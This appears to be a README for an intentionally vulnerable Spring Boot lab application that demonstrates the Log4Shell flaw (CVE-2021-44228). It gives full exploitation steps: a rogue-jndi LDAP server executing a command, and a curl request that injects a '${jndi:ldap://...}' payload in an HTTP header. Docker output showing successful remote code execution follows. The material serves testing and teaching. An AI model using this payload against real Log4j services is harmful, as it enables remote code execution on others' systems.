## https://sploitus.com/exploit?id=9E16D977-AA24-57C3-9BD1-98296F3186F5
# Log4Shell sample vulnerable application (CVE-2021-44228)
This is an almost copy/similar vulnerable application to https://github.com/christophetd/log4shell-vulnerable-app
The main differences are maven instead of gradle, and the usage of rogue-jndi.
This repository contains a maven Spring Boot web application vulnerable to CVE-2021-44228, nicknamed [Log4Shell](https://www.lunasec.io/docs/blog/log4j-zero-day/).
It uses Log4j 2.6.1 and JDK version 1.8.0_181.
## Running the springboot application
Build and run the docker springboot application:
```bash
docker build . -t vulnerable-app
docker run -p 8080:8080 vulnerable-app
```
## Exploitation
1. `git clone https://github.com/veracode-research/rogue-jndi`
2. `cd rogue-jndi`
3. `mvn package`
4. `java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test_if_rce" --hostname "192.168.1.x"`
Open a second terminal
5. `curl localhost:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.1.x:1389/o=reference}'`
Where in both cases 192.168.1.x is your IP
`NOTE: don't use localhost, use your actual private IP address.
`
Now check if RCE was succesful:
```sh
$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
04536dbd1dff vulnerable-app "java -jar demo-0.0.โฆ" 2 minutes ago Up 2 minutes 0.0.0.0:8080->8080/tcp, :::8080->8080/tcp gallant_easley
```
```sh
$ docker container exec -it 04536dbd1dff ash
/opt/app # ls /tmp
hsperfdata_root tomcat-docbase.8080.4585569232401237075
test_if_rce tomcat.8080.1707298461175346507
```
As you can see, the file `test_if_rce` exists. Which means RCE was succesful.
## NOTE
Code and ideas have been used from the following repositories:
- https://github.com/rayhan0x01/log4shell-vulnerable-app/tree/mod
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://github.com/christophetd/log4shell-vulnerable-app